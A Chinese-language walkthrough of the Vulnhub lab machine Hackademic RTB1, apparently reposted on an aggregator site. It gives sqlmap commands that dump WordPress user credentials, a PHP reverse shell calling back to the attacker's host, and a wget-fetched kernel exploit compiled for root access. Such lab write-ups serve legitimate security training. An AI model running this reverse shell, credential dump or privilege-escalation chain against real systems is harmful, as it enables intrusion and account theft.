【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

news/2024/11/29 10:48:32/

靶机介绍
官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/
在这里插入图片描述
需要读取靶机的root目录下key.txt
运行环境:
虚拟机网络设置的是NAT模式
靶机:IP地址:192.168.233.131
攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

image-20230703153927729

进入靶机

image​​

用wappalyzer查看用到技术

image

查看开放的端口

image-20230703173946936

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

image-20230703192555811

image-20230703192845503

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

image-20230703194526935

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

image-20230703202147050

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

image-20230703202222352

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

image-20230703202309068

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

image-20230703202333804

GeorgeMiller、q1w2e3登录

image-20230703203518703

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

image-20230703203557858

image-20230703204739867

kali打开监听

image-20230703204343618

运行反弹shell

image-20230703204715657

反弹shell成功

image-20230703204816477

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

image-20230703210505136​搜索内核漏洞

searchsploit 2.6.31

image-20230703210917302

下载到本地searchsploit -m 15285.c

image-20230703211758478​kali开启web服务器

image-20230703212054869

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

image-20230703212607768

编译脚本

gcc 15285.c -o exp

image-20230703213015682

将编译的exp赋予执行权限并执行exp

image-20230703213406686

提权成功id为0

image-20230703213620621


http://www.ppmy.cn/news/1086659.html

相关文章

uni-app 之 图片

uni-app 之 图片 获取图片 v-bind 动态绑定 image.png <template><view><view>--- 获取图片1 ---<image src"../../static/img/tabbar_home1.png"></image></view><view>--- 获取图片2 v-bind 动态绑定---<image v-bi…

Python中重要的条件语句教程

前言 嗨喽&#xff0c;大家好呀~这里是爱看美女的茜茜呐 一. 了解条件语句 假设一个场景&#xff1a; 同学们这个年龄去过网吧吗&#xff1f; 去网吧进门想要上网必须做的一件事是做什么&#xff1f;&#xff08;考虑重点&#xff09; 为什么要把身份证给工作人员&#xf…

嵌入式Linux开发实操(十五):nand flash接口开发(2)

通用NAND驱动程序支持几乎所有基于NAND的芯片,并将它们连接到Linux内核的内存技术设备(MTD)子系统。这个接口走的是nand的并口,可以在shell的/dev中看到设备,比如/mtd0、/mtd0ro…,mtdblock0、mtdblock1… sysfs在设备层次结构中提供了几个视角。设备必须挂在某条总线bus…

9.Redis-zset

zset zset 有序集合 -> 升序常用命令zaddzcardzcountzrangezrevrange -> reverse 逆序zrangebyscorezpopmaxzpopminbzpopmax / bzpopminzrankzrevrankzscorezremzremrangebyrankzremrangebyscorezincrby集合间操作zinter -> 交集zunion -> 并集zdiff -> 差集zin…

两个非递减顺序表合并成一个非递减顺序表

两个非递减顺序表合并成一个非递减顺序表 引入 以下这个例题的描述是关于合并两个有序的数组&#xff0c;然后合并之后同样也是一个非递减的顺序排列 但是我名这里讲的不是顺序表&#xff0c;而是封装成一个顺序表&#xff0c;但是我们这里的顺序表其实底层同样是一个数组&a…

渗透测试——安全漏洞扫描工具APPScan的安装与基本使用步骤

前言 HCL AppScan Standard是安全专家和渗透测试者设计的动态应用程序安全测试工具&#xff0c;AppScan使用强大的扫描引擎&#xff0c;会自动检索目标应用程序并测试漏洞。测试结果按优先级排列&#xff0c;允许操作员快速分类问题、发现最关键的漏洞。每个检测到的问题都可以…

电源模块的降额曲线

大家好&#xff0c;这里是大话硬件。 今天想写这篇文章来分享在前段时间了解的一个知识点——电源模块的降额曲线。 为什么要写这个呢&#xff1f;对于专门做电源的同学来说&#xff0c;肯定觉得很简单。但是对于一个非电源行业的人来说&#xff0c;曲线应该如何解读&#xff…

Large Language Models and Knowledge Graphs: Opportunities and Challenges

本文是LLM系列的文章&#xff0c;针对《Large Language Models and Knowledge Graphs: Opportunities and Challenges》的翻译。 大语言模型和知识图谱&#xff1a;机会与挑战 摘要1 引言2 社区内的共同辩论点3 机会和愿景4 关键研究主题和相关挑战5 前景 摘要 大型语言模型&…